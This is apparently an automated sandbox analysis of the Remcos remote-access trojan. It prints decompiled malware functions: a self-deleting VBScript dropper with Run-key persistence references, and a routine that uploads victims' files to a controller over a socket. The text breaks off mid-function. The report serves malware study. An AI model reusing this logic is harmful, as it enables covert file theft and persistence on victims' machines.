					L00410D5C(0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run\\", L00401EEB(0x46c4e8));
				}
				_t53 = E00402489();
				_t54 = L00401F95(0x46c560);
				_t57 = L00410A30(L00401F95(0x46c518), "exepath",  &_v692, 0x208, _t54, _t53);
				_t248 = _t57;
				if(_t57 == 0) {
					GetModuleFileNameW(0,  &_v692, 0x208);
				}
				RegDeleteKeyA(0x80000001, L00401F95(0x46c518));
				_t61 = SetFileAttributesW( &_v692, 0x80);
				_t140 = 0x46c530;
				asm("sbb bl, bl");
				_t134 =  ~_t61 & 0x00000001;
				_t62 = E004074E4(_t248);
				_t249 = _t62;
				if(_t62 != 0) {
					_t140 = 0x46c530;
					SetFileAttributesW(L00401EEB(0x46c530), 0x80);
				}
				E004030A6(_t134,  &_v124, E0040427F(_t134,  &_v52, L0043987F(_t134, _t140, _t249, L"Temp")), 0, _t249, L"\\update.vbs");
				L00401EF0();
				E00404405(_t134,  &_v28, L"On Error Resume Next\n", _t249, E0040427F(_t134,  &_v52, L"Set fso = CreateObject(\"Scripting.FileSystemObject\")\n"));
				L00401EF0();
				_t250 = _t134;
				if(_t134 != 0) {
					E00403311(E004030A6(_t134,  &_v52, E00404405(_t134,  &_v76, L"while fso.FileExists(\"", _t250, E0040427F(_t134,  &_v100,  &_v692)), 0, _t250, L"\")\n"));
					L00401EF0();
					L00401EF0();
					L00401EF0();
				}
				E00403311(E004030A6(_t134,  &_v100, E004030A6(_t134,  &_v76, E0040427F(_t134,  &_v52, L"fso.DeleteFile \""), 0, _t250,  &_v692), 0, _t250, L"\"\n"));
				L00401EF0();
				L00401EF0();
				L00401EF0();
				_t251 = _t134;
				if(_t134 != 0) {
					L0040766C(_t134,  &_v28, 0, L"wend\n");
				}
				_t78 = E004074E4(_t251);
				_t252 = _t78;
				if(_t78 != 0) {
					E00403311(E004030A6(0x45f724,  &_v100, L00409E69( &_v76, L"fso.DeleteFolder \"", _t252, 0x46c530), 0, _t252, L"\"\n"));
					L00401EF0();
					L00401EF0();
				}
				_t79 = E0040427F(0x45f724,  &_v172, L"\"\"\", 0");
				E00403311(E004030A6(0x45f724,  &_v100, E00403030( &_v76, E00404429(0x45f724,  &_v52, E0040427F(0x45f724,  &_v148, L"CreateObject(\"WScript.Shell\").Run \"cmd /c \"\""), _t252,  &_a4), _t79), 0, _t252, "\n"));
				L00401EF0();
				L00401EF0();
				L00401EF0();
				L00401EF0();
				L00401EF0();
				L0040766C(0x45f724,  &_v28, 0, L"fso.DeleteFile(Wscript.ScriptFullName)");
				_t92 = L00401EEB( &_v124);
				_t93 = E00402489();
				if(L00417947(L00401EEB( &_v28), _t93 + _t93, _t92, 0) != 0 && ShellExecuteW(0, L"open", L00401EEB( &_v124), 0x45f724, 0x45f724, 0) > 0x20) {
					ExitProcess(0);
				}
				L00401EF0();
				L00401EF0();
				return L00401EF0();
			}




























                                    0x0040b0ee
                                    0x0040b0fa
                                    0x0040b0fc
                                    0x0040b0fc
                                    0x0040b104
                                    0x0040b10a
                                    0x0040b10c
                                    0x0040b10c
                                    0x0040b118
                                    0x0040b126
                                    0x0040b126
                                    0x0040b130
                                    0x0040b135
                                    0x0040b13b
                                    0x0040b14c
                                    0x0040b151
                                    0x0040b152
                                    0x0040b158
                                    0x0040b169
                                    0x0040b16e
                                    0x0040b16f
                                    0x0040b175
                                    0x0040b189
                                    0x0040b18e
                                    0x0040b196
                                    0x0040b19e
                                    0x0040b1c4
                                    0x0040b1ce
                                    0x0040b1d0
                                    0x0040b1db
                                    0x0040b1db
                                    0x0040b1ee
                                    0x0040b206
                                    0x0040b211
                                    0x0040b216
                                    0x0040b218
                                    0x0040b21b
                                    0x0040b220
                                    0x0040b222
                                    0x0040b229
                                    0x0040b234
                                    0x0040b234
                                    0x0040b254
                                    0x0040b25d
                                    0x0040b278
                                    0x0040b281
                                    0x0040b286
                                    0x0040b288
                                    0x0040b2bc
                                    0x0040b2c4
                                    0x0040b2cc
                                    0x0040b2d4
                                    0x0040b2d4
                                    0x0040b30c
                                    0x0040b314
                                    0x0040b31c
                                    0x0040b324
                                    0x0040b329
                                    0x0040b32b
                                    0x0040b335
                                    0x0040b335
                                    0x0040b348
                                    0x0040b34d
                                    0x0040b34f
                                    0x0040b374
                                    0x0040b37c
                                    0x0040b384
                                    0x0040b384
                                    0x0040b399
                                    0x0040b3d8
                                    0x0040b3e0
                                    0x0040b3e8
                                    0x0040b3f0
                                    0x0040b3fb
                                    0x0040b406
                                    0x0040b413
                                    0x0040b41c
                                    0x0040b425
                                    0x0040b443
                                    0x0040b463
                                    0x0040b463
                                    0x0040b46c
                                    0x0040b474
                                    0x0040b487

                                    APIs
                                      • Part of subcall function 0041015B: TerminateProcess.KERNEL32(00000000,0046C500,0040D1DC), ref: 0041016B
                                      • Part of subcall function 0041015B: WaitForSingleObject.KERNEL32(000000FF), ref: 0041017E
                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040B1DB
                                    • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040B1EE
                                    • SetFileAttributesW.KERNEL32(?,00000080), ref: 0040B206
                                    • SetFileAttributesW.KERNEL32(00000000,00000080), ref: 0040B234
                                      • Part of subcall function 00409D73: TerminateThread.KERNEL32(0040884B,00000000,0046C500,0040ADA3,?,0046C518,0046C500), ref: 00409D82
                                      • Part of subcall function 00409D73: UnhookWindowsHookEx.USER32(00000000), ref: 00409D92
                                      • Part of subcall function 00409D73: TerminateThread.KERNEL32(00408830,00000000,?,0046C518,0046C500), ref: 00409DA4
                                      • Part of subcall function 00417947: CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,0045F724,00000000,00000000,?,0040B0BC,00000000,00000000), ref: 00417986
                                    • ShellExecuteW.SHELL32(00000000,open,00000000,0045F724,0045F724,00000000), ref: 0040B457
                                    • ExitProcess.KERNEL32 ref: 0040B463
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.518343742.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 0000000C.00000002.519789237.000000000046F000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: File$Terminate$AttributesProcessThread$CreateDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                    • String ID: """, 0$")$CreateObject("WScript.Shell").Run "cmd /c ""$On Error Resume Next$Remcos$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$\update.vbs$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$wend$while fso.FileExists("
                                    • API String ID: 1861856835-219127200
                                    • Opcode ID: bb25c8fdeaa4f241debf8e6a0405e14f512fb9588bc743e7edfe07456e5c5e86
                                    • Instruction ID: 15120c8502facc1a94d34f6ce0dfcdb30145111763f7023834469a4ad8d2fcb5
                                    • Opcode Fuzzy Hash: bb25c8fdeaa4f241debf8e6a0405e14f512fb9588bc743e7edfe07456e5c5e86
                                    • Instruction Fuzzy Hash: 52915E31A101185ACB14FBA1DCA6AEF776AAF50744F10007FB806771E3EF785E4A869D
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 004064A2, Relevance: 24.8, APIs: 9, Strings: 5, Instructions: 345fileCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 77%
                                    			E004064A2(intOrPtr __ecx, void* __edx, WCHAR* _a4, char _a8, char _a32, char _a56) {
				void* _v12;
				union _LARGE_INTEGER _v16;
				struct _OVERLAPPED* _v20;
				long _v24;
				long _v28;
				intOrPtr _v32;
				long _v36;
				struct _OVERLAPPED* _v40;
				union _LARGE_INTEGER* _v44;
				signed int _v48;
				signed int _v52;
				struct %anon52 _v64;
				intOrPtr _v68;
				struct %anon52 _v80;
				union _LARGE_INTEGER _v84;
				intOrPtr _v88;
				char _v112;
				char _v136;
				char _v160;
				char _v184;
				char _v208;
				char _v232;
				char _v256;
				char _v280;
				char _v304;
				char _v328;
				char _v352;
				char _v376;
				char _v400;
				char _v424;
				char _v448;
				char _v472;
				void* __ebx;
				void* __edi;
				void* __esi;
				struct %anon52 _t117;
				void* _t119;
				void* _t126;
				long _t136;
				void* _t137;
				signed int _t138;
				struct _OVERLAPPED* _t145;
				signed int _t148;
				void* _t154;
				void* _t156;
				void* _t157;
				void* _t173;
				long _t198;
				signed int _t203;
				void* _t216;
				union _LARGE_INTEGER _t280;
				intOrPtr _t281;
				union _LARGE_INTEGER* _t295;
				void* _t297;
				void* _t301;
				void* _t302;
				void* _t303;
				void* _t304;
				void* _t305;

				_t278 = __edx;
				_v68 = __ecx;
				E0040498B(__ecx);
				_t302 = _t301 - 0x10;
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_t299 = _v68;
				E00404A08(__edx);
				_v28 = 0x186a0;
				_v20 = 0;
				_t297 = CreateFileW(_a4, 0x80000000, 1, 0, 3, 0x80, 0);
				_t310 = _t297 - 0xffffffff;
				if(_t297 != 0xffffffff) {
					_v80.LowPart = 0;
					_v80.HighPart = 0;
					__imp__GetFileSizeEx(_t297,  &_v80);
					_t203 = _v80.HighPart;
					_t117 = _v80;
					_v48 = _t203;
					_v32 = _t203;
					_v52 = _t117;
					_v16.LowPart = _t117;
					E0040427F(0,  &_v112, _a4);
					_t119 = E0041733B( &_v136,  &_v112);
					_t303 = _t302 - 0x18;
					_t280 = "Uploading file to Controller: ";
					L004075C2(0, _t303, _t280, _t297, __eflags, _t119);
					_t304 = _t303 - 0x14;
					E00402084(0, _t304, "[Info]");
					L00416C80(0, _t297);
					_t305 = _t304 + 0x30;
					L00401FC7();
					L00401EF0();
					_v36 = 1;
					_v40 = 0;
					_t126 = L00450880(_v52, _v48, 0x186a0, 0);
					_t210 = _t280;
					asm("xorps xmm0, xmm0");
					_v88 = _t126 + 1;
					asm("adc ecx, ebx");
					asm("movlpd [ebp-0x3c], xmm0");
					_v84.LowPart = _t280;
					__eflags = _v48;
					if(__eflags < 0) {
						L17:
						CloseHandle(_t297);
						L00404E0B(_t299);
						_t198 = 1;
					} else {
						if(__eflags > 0) {
							L5:
							_v44 = _v64.HighPart.LowPart;
							_v64.HighPart.LowPart = _v64;
							_t136 = 0x186a0;
							goto L6;
							do {
								do {
									L6:
									_t281 = _v32;
									__eflags = _v20 - _t281;
									if(__eflags >= 0) {
										_t210 = _v16.LowPart;
										if(__eflags > 0) {
											L9:
											_t136 = _t210;
											_v20 = _t281;
											_v28 = _t136;
										} else {
											__eflags = _t136 - _t210;
											if(__eflags > 0) {
												goto L9;
											}
										}
									}
									_push(_t136);
									_t137 = E0042F4C6(_t210, _t281, _t299, __eflags);
									_push(0);
									_v12 = _t137;
									_v24 = 0;
									_t138 = SetFilePointerEx(_t297, _v64.HighPart.LowPart, _v44, 0);
									__eflags = _t138;
									if(_t138 == 0) {
										_t306 = _t305 - 0x18;
										_t216 = _t305 - 0x18;
										_push("SetFilePointerEx error");
										goto L23;
									} else {
										_t148 = ReadFile(_t297, _v12, _v28,  &_v24, 0);
										__eflags = _t148;
										if(_t148 == 0) {
											_t306 = _t305 - 0x18;
											_t216 = _t305 - 0x18;
											_push("ReadFile error");
											L23:
											E00402084(0, _t216);
											E00402084(0, _t306 - 0x18, "[ERROR]");
											L00416C80(0, _t297);
											E0042F4CF(_v12);
											CloseHandle(_t297);
											goto L24;
										} else {
											__eflags = _v24;
											if(__eflags == 0) {
												E0042F4CF(_v12);
												CloseHandle(_t297);
												L00404E0B(_t299);
												_t145 = 1;
												goto L25;
											} else {
												E0040427F(0,  &_v112, _a4);
												_t154 = E004020AB(0,  &_v472, _t281, __eflags, _v12, _v24);
												_t305 = _t305 - 0x18;
												_t156 = E00417260(0x46c238,  &_v448, _v88, _v84);
												_t157 = E00417260(0x46c238,  &_v424, _v36, _v40);
												L00402F1D(_t305, L00402F93(0x46c238,  &_v136, L00402F93(0x46c238,  &_v160, L00402F93(0x46c238,  &_v184, L00402F1D( &_v208, L00402F93(0x46c238,  &_v232, L00402F1D( &_v256, L00402F93(0x46c238,  &_v280, L00402F93(0x46c238,  &_v304, L00402F93(0x46c238,  &_v328, L00402F93(0x46c238,  &_v352, L00402F93(0x46c238,  &_v376, E0041739C(0x46c238,  &_v400,  &_v112), __eflags, 0x46c238), __eflags,  &_a8), __eflags, 0x46c238), __eflags,  &_a32), __eflags, 0x46c238), _t157), __eflags, 0x46c238), _t156), __eflags, 0x46c238), __eflags,  &_a56), __eflags, 0x46c238), _t154);
												_t299 = _v68;
												_push(0x52);
												_t173 = L00404AA4(0x46c238, _v68, _t171, __eflags);
												__eflags = _t173 - 0xffffffff;
												L00401FC7();
												L00401FC7();
												L00401FC7();
												L00401FC7();
												L00401FC7();
												L00401FC7();
												L00401FC7();
												L00401FC7();
												L00401FC7();
												L00401FC7();
												L00401FC7();
												L00401FC7();
												L00401FC7();
												L00401FC7();
												L00401FC7();
												L00401EF0();
												__eflags = 0x46c200 | _t173 == 0xffffffff;
												if((0x46c200 | _t173 == 0xffffffff) != 0) {
													L00404E0B(_t299);
													CloseHandle(_t297);
													E0042F4CF(_v12);
													_t198 = 0;
												} else {
													goto L14;
												}
											}
										}
									}
									goto L18;
									L14:
									E0042F4CF(_v12);
									_t136 = _v28;
									_v16.LowPart = _v16 - _t136;
									_t295 = _v44;
									asm("sbb ecx, [ebp-0x10]");
									_v36 = _v36 + 1;
									_push(0);
									_pop(0);
									asm("adc [ebp-0x24], ebx");
									_t210 = _v64.HighPart.LowPart + _t136;
									_v64.HighPart = _t210;
									asm("adc edx, [ebp-0x10]");
									_v44 = _t295;
									__eflags = _t295 - _v48;
								} while (__eflags < 0);
								if(__eflags > 0) {
									goto L17;
								} else {
									goto L16;
								}
								goto L18;
								L16:
								__eflags = _t210 - _v52;
							} while (_t210 < _v52);
							goto L17;
						} else {
							__eflags = _v52;
							if(_v52 <= 0) {
								goto L17;
							} else {
								goto L5;
							}
						}
					}
				} else {
					E004020EC(0, _t302 - 0x18, _t278, _t310,  &_a8);
					_push(0x53);
					L00404AA4(0, 0x46c2e8, _t278, _t310);
					L24:
					L00404E0B(_t299);
					_t145 = 0;
					L25:
					_t198 = _t145;
				}
				L18:
				L00401FC7();
				L00401FC7();
				L00401FC7();
				return _t198;
			}






























































                                    0x004064a2
                                    0x004064ae
                                    0x004064b1
                                    0x004064b6
                                    0x004064c0
                                    0x004064c1
                                    0x004064c2
                                    0x004064c3
                                    0x004064c4
                                    0x004064c9
                                    0x004064d0
                                    0x004064ea
                                    0x004064f3
                                    0x004064f5
                                    0x004064f8
                                    0x0040651c
                                    0x00406521
                                    0x00406524
                                    0x0040652a
                                    0x0040652d
                                    0x00406533
                                    0x00406536
                                    0x0040653c
                                    0x0040653f
                                    0x00406542
                                    0x00406550
                                    0x00406555
                                    0x00406558
                                    0x00406560
                                    0x00406565
                                    0x0040656f
                                    0x00406574
                                    0x00406579
                                    0x00406582
                                    0x0040658a
                                    0x00406595
                                    0x004065a0
                                    0x004065a6
                                    0x004065ae
                                    0x004065b0
                                    0x004065b3
                                    0x004065b6
                                    0x004065b8
                                    0x004065bd
                                    0x004065c0
                                    0x004065c3
                                    0x00406864
                                    0x00406865
                                    0x0040686d
                                    0x00406872
                                    0x004065c9
                                    0x004065c9
                                    0x004065d4
                                    0x004065d7
                                    0x004065dd
                                    0x004065e0
                                    0x004065e0
                                    0x004065e5
                                    0x004065e5
                                    0x004065e5
                                    0x004065e5
                                    0x004065e8
                                    0x004065eb
                                    0x004065ed
                                    0x004065f0
                                    0x004065f6
                                    0x004065f6
                                    0x004065f8
                                    0x004065fb
                                    0x004065f2
                                    0x004065f2
                                    0x004065f4
                                    0x00000000
                                    0x00000000
                                    0x004065f4
                                    0x004065f0
                                    0x004065fe
                                    0x004065ff
                                    0x00406605
                                    0x0040660a
                                    0x00406610
                                    0x00406614
                                    0x0040661a
                                    0x0040661c
                                    0x004068da
                                    0x004068dd
                                    0x004068df
                                    0x00000000
                                    0x00406622
                                    0x0040662f
                                    0x00406635
                                    0x00406637
                                    0x004068ce
                                    0x004068d1
                                    0x004068d3
                                    0x004068e4
                                    0x004068e4
                                    0x004068f3
                                    0x004068f8
                                    0x00406900
                                    0x00406909
                                    0x00000000
                                    0x0040663d
                                    0x0040663d
                                    0x00406641
                                    0x004068b5
                                    0x004068bc
                                    0x004068c4
                                    0x004068cb
                                    0x00000000
                                    0x00406647
                                    0x0040664d
                                    0x0040665e
                                    0x00406663
                                    0x00406680
                                    0x00406695
                                    0x00406754
                                    0x00406759
                                    0x0040675d
                                    0x00406761
                                    0x00406766
                                    0x00406772
                                    0x0040677d
                                    0x00406788
                                    0x00406793
                                    0x0040679e
                                    0x004067a9
                                    0x004067b4
                                    0x004067bf
                                    0x004067ca
                                    0x004067d5
                                    0x004067e0
                                    0x004067eb
                                    0x004067f6
                                    0x00406801
                                    0x0040680c
                                    0x00406814
                                    0x00406819
                                    0x0040681b
                                    0x00406899
                                    0x0040689f
                                    0x004068a8
                                    0x004068ae
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x0040681b
                                    0x00406641
                                    0x00406637
                                    0x00000000
                                    0x0040681d
                                    0x00406820
                                    0x00406825
                                    0x00406828
                                    0x0040682b
                                    0x00406832
                                    0x00406835
                                    0x00406839
                                    0x00406841
                                    0x00406842
                                    0x00406845
                                    0x00406847
                                    0x0040684a
                                    0x0040684d
                                    0x00406850
                                    0x00406850
                                    0x00406859
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x0040685b
                                    0x0040685b
                                    0x0040685b
                                    0x00000000
                                    0x004065cb
                                    0x004065cb
                                    0x004065ce
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x004065ce
                                    0x004065c9
                                    0x004064fa
                                    0x00406503
                                    0x00406508
                                    0x0040650f
                                    0x0040690f
                                    0x00406911
                                    0x00406916
                                    0x00406918
                                    0x00406918
                                    0x00406918
                                    0x00406874
                                    0x00406877
                                    0x0040687f
                                    0x00406887
                                    0x00406894

                                    APIs
                                      • Part of subcall function 00404A08: connect.WS2_32(?,0046DBA0,00000010), ref: 00404A23
                                    • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 004064ED
                                    • GetFileSizeEx.KERNEL32(00000000,?), ref: 00406524
                                    • __aulldiv.LIBCMT ref: 004065A6
                                    • SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000,?,?,000186A0,00000000), ref: 00406614
                                    • ReadFile.KERNEL32(00000000,?,000186A0,?,00000000), ref: 0040662F
                                      • Part of subcall function 00404AA4: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B18
                                      • Part of subcall function 00404E0B: closesocket.WS2_32(?), ref: 00404E11
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.518343742.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 0000000C.00000002.519789237.000000000046F000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: File$CreatePointerReadSize__aulldivclosesocketconnectsend
                                    • String ID: ReadFile error$SetFilePointerEx error$Uploading file to Controller: $[ERROR]$[Info]
                                    • API String ID: 1319223106-2190262076
                                    • Opcode ID: 4dbe64790c62d5ee7030b993c1dde1e61187f4f8000e9570b2f5292ed33d26a1
                                    • Instruction ID: 173749a7d42c5eabba2dba03019d43edcf8f50480dc145d367e539a2da324ad2
                                    • Opcode Fuzzy Hash: 4dbe64790c62d5ee7030b993c1dde1e61187f4f8000e9570b2f5292ed33d26a1
                                    • Instruction Fuzzy Hash: F5C16B31A00219ABCB14FBA5DD829EEB7B5AF44304F10817FF406B62D1EF385A449F99
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00449546, Relevance: 19.6, APIs: 13, Instructions: 114COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 100%
                                    			E00449546(intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _t25;
				intOrPtr* _t26;
				intOrPtr _t28;
				intOrPtr* _t29;
				intOrPtr* _t31;
				intOrPtr* _t45;
				intOrPtr* _t46;
				intOrPtr* _t47;
				intOrPtr* _t55;
				intOrPtr* _t70;
				intOrPtr _t74;

				_t74 = _a4;
				_t25 =  *((intOrPtr*)(_t74 + 0x88));
				if(_t25 != 0 && _t25 != 0x46a188) {
					_t45 =  *((intOrPtr*)(_t74 + 0x7c));
					if(_t45 != 0 &&  *_t45 == 0) {
						_t46 =  *((intOrPtr*)(_t74 + 0x84));
						if(_t46 != 0 &&  *_t46 == 0) {
							E004401F5(_t46);
							L00448782( *((intOrPtr*)(_t74 + 0x88)));
						}
						_t47 =  *((intOrPtr*)(_t74 + 0x80));
						if(_t47 != 0 &&  *_t47 == 0) {
							E004401F5(_t47);
							L00448C3C( *((intOrPtr*)(_t74 + 0x88)));
						}
						E004401F5( *((intOrPtr*)(_t74 + 0x7c)));
						E004401F5( *((intOrPtr*)(_t74 + 0x88)));
					}
				}
				_t26 =  *((intOrPtr*)(_t74 + 0x8c));
				if(_t26 != 0 &&  *_t26 == 0) {
					E004401F5( *((intOrPtr*)(_t74 + 0x90)) - 0xfe);
					E004401F5( *((intOrPtr*)(_t74 + 0x94)) - 0x80);
					E004401F5( *((intOrPtr*)(_t74 + 0x98)) - 0x80);
					E004401F5( *((intOrPtr*)(_t74 + 0x8c)));
				}
				L004496B9( *((intOrPtr*)(_t74 + 0x9c)));
				_t28 = 6;
				_t16 = _t74 + 0xa0; // 0xa0
				_t55 = _t16;
				_v8 = _t28;
				_t18 = _t74 + 0x28; // 0x28
				_t70 = _t18;
				do {
					if( *((intOrPtr*)(_t70 - 8)) != 0x46a2a8) {
						_t31 =  *_t70;
						if(_t31 != 0 &&  *_t31 == 0) {
							E004401F5(_t31);
							E004401F5( *_t55);
						}
						_t28 = _v8;
					}
					if( *((intOrPtr*)(_t70 - 0xc)) != 0) {
						_t29 =  *((intOrPtr*)(_t70 - 4));
						if(_t29 != 0 &&  *_t29 == 0) {
							E004401F5(_t29);
						}
						_t28 = _v8;
					}
					_t55 = _t55 + 4;
					_t70 = _t70 + 0x10;
					_t28 = _t28 - 1;
					_v8 = _t28;
				} while (_t28 != 0);
				return E004401F5(_t74);
			}















                                    0x0044954e
                                    0x00449552
                                    0x0044955a
                                    0x00449563
                                    0x00449568
                                    0x0044956f
                                    0x00449577
                                    0x0044957f
                                    0x0044958a
                                    0x00449590
                                    0x00449591
                                    0x00449599
                                    0x004495a1
                                    0x004495ac
                                    0x004495b2
                                    0x004495b6
                                    0x004495c1
                                    0x004495c7
                                    0x00449568
                                    0x004495c8
                                    0x004495d0
                                    0x004495e3
                                    0x004495f6
                                    0x00449604
                                    0x0044960f
                                    0x00449614
                                    0x0044961d
                                    0x00449625
                                    0x00449626
                                    0x00449626
                                    0x0044962c
                                    0x0044962f
                                    0x0044962f
                                    0x00449632
                                    0x00449639
                                    0x0044963b
                                    0x0044963f
                                    0x00449647
                                    0x0044964e
                                    0x00449654
                                    0x00449655
                                    0x00449655
                                    0x0044965c
                                    0x0044965e
                                    0x00449663
                                    0x0044966b
                                    0x00449670
                                    0x00449671
                                    0x00449671
                                    0x00449674
                                    0x00449677
                                    0x0044967a
                                    0x0044967d
                                    0x0044967d
                                    0x0044968f

                                    APIs
                                    • ___free_lconv_mon.LIBCMT ref: 0044958A
                                      • Part of subcall function 00448782: _free.LIBCMT ref: 0044879F
                                      • Part of subcall function 00448782: _free.LIBCMT ref: 004487B1
                                      • Part of subcall function 00448782: _free.LIBCMT ref: 004487C3
                                      • Part of subcall function 00448782: _free.LIBCMT ref: 004487D5
                                      • Part of subcall function 00448782: _free.LIBCMT ref: 004487E7
                                      • Part of subcall function 00448782: _free.LIBCMT ref: 004487F9
                                      • Part of subcall function 00448782: _free.LIBCMT ref: 0044880B
                                      • Part of subcall function 00448782: _free.LIBCMT ref: 0044881D
                                      • Part of subcall function 00448782: _free.LIBCMT ref: 0044882F
                                      • Part of subcall function 00448782: _free.LIBCMT ref: 00448841
                                      • Part of subcall function 00448782: _free.LIBCMT ref: 00448853
                                      • Part of subcall function 00448782: _free.LIBCMT ref: 00448865
                                      • Part of subcall function 00448782: _free.LIBCMT ref: 00448877
                                    • _free.LIBCMT ref: 0044957F
                                      • Part of subcall function 004401F5: RtlFreeHeap.NTDLL(00000000,00000000,?,00448EEF,00000000,00000000,00000000,00000000,?,00449193,00000000,00000007,00000000,?,004496DE,00000000), ref: 0044020B
                                      • Part of subcall function 004401F5: GetLastError.KERNEL32(00000000,?,00448EEF,00000000,00000000,00000000,00000000,?,00449193,00000000,00000007,00000000,?,004496DE,00000000,00000000), ref: 0044021D
                                    • _free.LIBCMT ref: 004495A1
                                    • _free.LIBCMT ref: 004495B6
                                    • _free.LIBCMT ref: 004495C1
                                    • _free.LIBCMT ref: 004495E3
                                    • _free.LIBCMT ref: 004495F6
                                    • _free.LIBCMT ref: 00449604
                                    • _free.LIBCMT ref: 0044960F
                                    • _free.LIBCMT ref: 00449647
                                    • _free.LIBCMT ref: 0044964E
                                    • _free.LIBCMT ref: 0044966B
                                    • _free.LIBCMT ref: 00449683
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.518343742.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 0000000C.00000002.519789237.000000000046F000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                    • String ID:
                                    • API String ID: 161543041-0
                                    • Opcode ID: 8a20b96b7aaffb75a5641ff102c264423d38ea1ece813b4e11af4ccf0b9ee35c
                                    • Instruction ID: bc7df33f33a806a4e6538402b94214bd38d1e854ce5dbc401830de06ad29eac0
                                    • Opcode Fuzzy Hash: 8a20b96b7aaffb75a5641ff102c264423d38ea1ece813b4e11af4ccf0b9ee35c
                                    • Instruction Fuzzy Hash: 46316B32600601AFFB21AA3AD845B5B73E8AF01354F21441FE659D7251DF3AAD509B2C
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0044F255, Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 41%
                                    			E0044F255(void* __ecx, intOrPtr* _a4, signed int* _a8, intOrPtr _a12, signed int _a16, intOrPtr _a20, intOrPtr _a24) {
				signed int _v5;
				char _v6;
				void* _v12;
				signed int _v16;
				signed int _v20;
				char _v24;
				intOrPtr _v36;
				signed int _v44;
				void _v48;
				char _v72;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t114;
				signed int _t123;
				signed char _t124;
				signed int _t134;
				intOrPtr _t164;
				intOrPtr _t180;
				signed int* _t190;
				signed int _t192;
				char _t197;
				signed int _t203;
				signed int _t206;
				signed int _t215;
				signed int _t217;
				signed int _t219;
				signed int _t225;
				signed int _t227;
				signed int _t234;
				signed int _t235;
				signed int _t237;
				signed int _t239;
				signed char _t242;
				intOrPtr _t245;
				void* _t248;
				void* _t252;
				void* _t262;
				signed int _t263;
				signed int _t266;
				signed int _t269;
				signed int _t270;
				void* _t272;
				void* _t274;
				void* _t275;
				void* _t277;
				void* _t278;
				void* _t280;
				void* _t284;

				_t262 = L0044EFB8(__ecx,  &_v72, _a16, _a20, _a24);
				_t192 = 6;
				memcpy( &_v48, _t262, _t192 << 2);
				_t274 = _t272 + 0x1c;
				_t248 = _t262 + _t192 + _t192;
				_t263 = _t262 | 0xffffffff;
				if(_v36 != _t263) {
					_t114 = E00448575(_t248, _t263, __eflags);
					_t190 = _a8;
					 *_t190 = _t114;
					__eflags = _t114 - _t263;
					if(_t114 != _t263) {
						_v20 = _v20 & 0x00000000;
						_v24 = 0xc;
						_t275 = _t274 - 0x18;
						 *_a4 = 1;
						_push(6);
						_v16 =  !(_a16 >> 7) & 1;
						_push( &_v24);
						_push(_a12);
						memcpy(_t275,  &_v48, 1 << 2);
						_t197 = 0;
						_t252 = L0044EF23();
						_t277 = _t275 + 0x2c;
						_v12 = _t252;
						__eflags = _t252 - 0xffffffff;
						if(_t252 != 0xffffffff) {
							L11:
							_t123 = GetFileType(_t252);
							__eflags = _t123;
							if(_t123 != 0) {
								__eflags = _t123 - 2;
								if(_t123 != 2) {
									__eflags = _t123 - 3;
									_t124 = _v48;
									if(_t123 == 3) {
										_t124 = _t124 | 0x00000008;
										__eflags = _t124;
									}
								} else {
									_t124 = _v48 | 0x00000040;
								}
								_v5 = _t124;
								E004484BE(_t197,  *_t190, _t252);
								_t242 = _v5 | 0x00000001;
								_v5 = _t242;
								_v48 = _t242;
								 *( *((intOrPtr*)(0x46b800 + ( *_t190 >> 6) * 4)) + 0x28 + ( *_t190 & 0x0000003f) * 0x30) = _t242;
								_t203 =  *_t190;
								_t205 = (_t203 & 0x0000003f) * 0x30;
								__eflags = _a16 & 0x00000002;
								 *((char*)( *((intOrPtr*)(0x46b800 + (_t203 >> 6) * 4)) + 0x29 + (_t203 & 0x0000003f) * 0x30)) = 0;
								if((_a16 & 0x00000002) == 0) {
									L20:
									_v6 = 0;
									_push( &_v6);
									_push(_a16);
									_t278 = _t277 - 0x18;
									_t206 = 6;
									_push( *_t190);
									memcpy(_t278,  &_v48, _t206 << 2);
									_t134 = L0044ECD6(_t190,  &_v48 + _t206 + _t206,  &_v48);
									_t280 = _t278 + 0x30;
									__eflags = _t134;
									if(__eflags == 0) {
